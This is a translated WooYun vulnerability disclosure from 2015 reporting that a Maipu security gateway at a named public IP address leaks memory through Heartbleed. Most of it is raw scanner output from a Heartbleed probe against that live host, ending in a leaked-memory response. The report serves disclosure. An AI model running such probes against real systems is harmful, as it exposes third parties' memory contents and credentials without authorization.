
Vulnerability Summary

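Bug ID: wooyun-2015-0118186

Title: A Maipu Communication security gateway is affected by Heartbleed

Vendor: maipu.cn

Reporter: 路人甲

Submitted: 2015-06-04 14:09

Fix time: 2015-06-09 14:10

Public disclosure: 2015-06-09 14:10

Vulnerability type: Sensitive information disclosure

Severity: High

Self-assessed Rank: 20

Status: The vendor has been notified of the vulnerability but has ignored it

Source: http://www.wooyun.org; for questions or help, contact [email protected]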



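Vulnerability Details

Disclosure status:

2015-06-04: Details sent to the vendor; awaiting vendor handling
2015-06-09: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

**

Detailed description:

Address: https://58.221.91.194/login.html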

[*] 58.221.91.194:443 - Sending Client Hello...
[!] SSL record #1:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 86
[!] Handshake #1:
[!] Length: 82
[!] Type: Server Hello (2)
[!] Server Hello Version: 0x0301
[!] Server Hello random data: 556fd66ef9aa1510320df88a51d80a631047da3ffce1b1304486bbe92a44ed0d
[!] Server Hello Session ID length: 32
[!] Server Hello Session ID: 9ffc7a35aeabe4f585b8d5594a9f465165865a1d3ec9beed7505e6cf3ed30725
[!] SSL record #2:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 707
[!] Handshake #1:
[!] Length: 703
[!] Type: Certificate Data (11)
[!] Certificates length: 700
[!] Data length: 703
[!] Certificate #1:
[!] Certificate #1: Length: 697
[!] Certificate #1: #<OpenSSL::X509::Certificate subject=#<OpenSSL::X509::Name:0x00000005687680>, issuer=#<OpenSSL::X509::Name:0x000000056875b8>, serial=#<OpenSSL::BN:0x000000056874f0>, not_before=2012-04-16 12:56:48 UTC, not_after=2022-04-24 12:56:48 UTC>
[!] SSL record #3:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 203
[!] Handshake #1:
[!] Length: 199
[!] Type: Server Key Exchange (12)
[!] SSL record #4:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 4
[!] Handshake #1:
[!] Length: 0
[!] Type: Server Hello Done (14)
[*] 58.221.91.194:443 - Sending Client Hello...
[!] SSL record #1:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 86
[!] Handshake #1:
[!] Length: 82
[!] Type: Server Hello (2)
[!] Server Hello Version: 0x0301
[!] Server Hello random data: 556fd67959f6d9534df1a7521901d3097ca2c90afe4a78a72372beecbb1b0375
[!] Server Hello Session ID length: 32
[!] Server Hello Session ID: ac3710dc37e28416eefa02da2f28f6a95d112b9ebb46160f88c78b7c53ebec7e
[!] SSL record #2:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 707
[!] Handshake #1:
[!] Length: 703
[!] Type: Certificate Data (11)
[!] Certificates length: 700
[!] Data length: 703
[!] Certificate #1:
[!] Certificate #1: Length: 697
[!] Certificate #1: #<OpenSSL::X509::Certificate subject=#<OpenSSL::X509::Name:0x000000055da340>, issuer=#<OpenSSL::X509::Name:0x000000055da2a0>, serial=#<OpenSSL::BN:0x000000055da200>, not_before=2012-04-16 12:56:48 UTC, not_after=2022-04-24 12:56:48 UTC>
[!] SSL record #3:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 203
[!] Handshake #1:
[!] Length: 199
[!] Type: Server Key Exchange (12)
[!] SSL record #4:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 4
[!] Handshake #1:
[!] Length: 0
[!] Type: Server Hello Done (14)
[*] 58.221.91.194:443 - Sending Heartbeat...
[*] 58.221.91.194:443 - Heartbeat response, 12955 bytes
[+] 58.221.91.194:443 - Heartbeat response with leak
[*] 58.221.91.194:443 - Printable info leaked: Uo$M 5.[8sWyo{_f"!98532ED/A
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Proof of vulnerability:

As the title says.

Remediation:

***

Copyright notice: when reposting, please credit the source, 路人甲@乌云


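Vulnerability Response

Vendor response:

Severity: No impact; ignored by vendor

Ignored on: 2015-06-09 14:10

Vendor reply:

Vulnerability Rank: 4 (WooYun assessment)

Latest status:

None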